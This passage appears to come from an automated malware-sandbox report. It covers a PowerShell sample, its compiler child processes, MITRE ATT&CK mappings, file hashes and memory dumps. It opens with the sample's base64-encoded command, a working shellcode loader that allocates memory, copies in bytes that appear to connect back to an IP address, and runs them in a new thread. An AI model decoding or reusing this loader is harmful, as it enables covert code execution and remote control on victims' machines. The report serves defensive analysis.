4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4ADMAOQAsADAAeAAzADIALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADYALAAwAHgAMwA4ACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwAwACwAMAB4ADMAMAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMwAsADAAeAAwADAAOwAkAHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:640
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\db3trqxe\db3trqxe.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCC8.tmp" "c:\Users\Admin\AppData\Local\Temp\db3trqxe\CSC95D4F2F52C83438194D63B52B47F7F2.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBCC8.tmp

Filesize
1KB

MD5
a2da5766a4d8b54d65927511c86201a3

SHA1
4a928de335d0e1684e15f04d046f1c646533f54d

SHA256
d2863246db7ac48a2d4dadab2ebecf28b75e080a4882910ea397ff10956d5c81

SHA512
205fbc087930f62ab76f5aa96eb448dcd8e1bec9f0ae14a6630be8a39710ccd49be579e4676dd79bed39e59904deea7e12587bce43432e32715d362d86880aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nnqn134.x10.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\db3trqxe\db3trqxe.dll

Filesize
3KB

MD5
7a4ed60aa42d77b7f4a38bfae99a0c3f

SHA1
6439cf873a4fdc470064c4c2218c7fefdc418520

SHA256
3c7c6447e7bc5c6e392ee48d8df4e63258d627ad9aade1bc3900b44f7cc7132a

SHA512
8d93c8c24f819b75a35eff164af5c2cfddda7b212b58ea9f13756009168d73965e062706ea9906417d17f71227af8baaaf8176fe3a7e3bad91d70453aa1b502a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
2KB

MD5
7ccc1453baccaef5c2fead44155c87b3

SHA1
0dda2c56e8db0f8308376cb7a1936e58130c57f8

SHA256
dfa33608006d7173133aaa559ff0f1a738b758d4f34e97373c631da865878a5b

SHA512
bd01a03d2567ae85dc8085a5894a5d257faecf430374b25aeb28339876eca4e14961cf64db61fda76882ee091e2759da96dc1f92768a39bab99eac96b7f91687

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\db3trqxe\CSC95D4F2F52C83438194D63B52B47F7F2.TMP

Filesize
652B

MD5
13f73f2d1c237f2a0ad77751af141e65

SHA1
7bb651404a2a84160bf71dfade0d9fa08424b9fa

SHA256
e9c50572dd4075ac738d38d76e519066061f6bc0afdb0c7f03c17c70089068c8

SHA512
e85a6da09ffb21b103a95b6ebaa9854254edb9386251fe29ee97e6cbd2478af5c5aaf9be71ca9fb46bd7d7a582717e742b2b77feaa18a03729d7efd69f4a191c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\db3trqxe\db3trqxe.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\db3trqxe\db3trqxe.cmdline

Filesize
369B

MD5
a4d73a3feb3a97b8caa801dfa514c721

SHA1
73560c89b5078c678bd9339a3991a0d5e68bbd3f

SHA256
31f0379f54f5f660959e7e5e1937f12807a79374a0d86205df6943a6f48434d8

SHA512
6c380c431aaa48deb64e7cf73aaf509ebda4b1608f9c56163a44e2d407c8c1a77557b2f35f4acc2ade3f5e780a40651fce43b8e6bfe07ce26d6a75a3147e65a0

Download Submit
memory/640-75-0x00000000063A0000-0x00000000063A8000-memory.dmp

Filesize
32KB

Download
memory/640-78-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/640-62-0x0000000006330000-0x000000000634A000-memory.dmp

Filesize
104KB

Download
memory/640-61-0x0000000007680000-0x0000000007CFA000-memory.dmp

Filesize
6.5MB

Download
memory/640-60-0x0000000005E40000-0x0000000005E8C000-memory.dmp

Filesize
304KB

Download
memory/640-59-0x0000000005E00000-0x0000000005E1E000-memory.dmp

Filesize
120KB

Download
memory/640-58-0x0000000005800000-0x0000000005B54000-memory.dmp

Filesize
3.3MB

Download
memory/640-48-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/640-47-0x0000000004FF0000-0x0000000005056000-memory.dmp

Filesize
408KB

Download
memory/640-46-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/640-45-0x0000000005060000-0x0000000005688000-memory.dmp

Filesize
6.2MB

Download
memory/640-44-0x00000000024E0000-0x0000000002516000-memory.dmp

Filesize
216KB

Download
memory/2088-30-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/2088-31-0x000001AF77160000-0x000001AF77182000-memory.dmp

Filesize
136KB

Download
memory/2088-84-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-8-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-17-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-10-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-18-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-9-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-15-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-16-0x00007FF818C60000-0x00007FF818C70000-memory.dmp

Filesize
64KB

Download
memory/3964-4-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/3964-13-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-12-0x00007FF818C60000-0x00007FF818C70000-memory.dmp

Filesize
64KB

Download
memory/3964-28-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-11-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-19-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-0-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/3964-14-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-7-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/3964-6-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-5-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-2-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/3964-77-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-3-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/3964-79-0x00007FF85ADED000-0x00007FF85ADEE000-memory.dmp

Filesize
4KB

Download
memory/3964-83-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-29-0x00007FF85AD50000-0x00007FF85AF45000-memory.dmp

Filesize
2.0MB

Download
memory/3964-1-0x00007FF85ADED000-0x00007FF85ADEE000-memory.dmp

Filesize
4KB

Download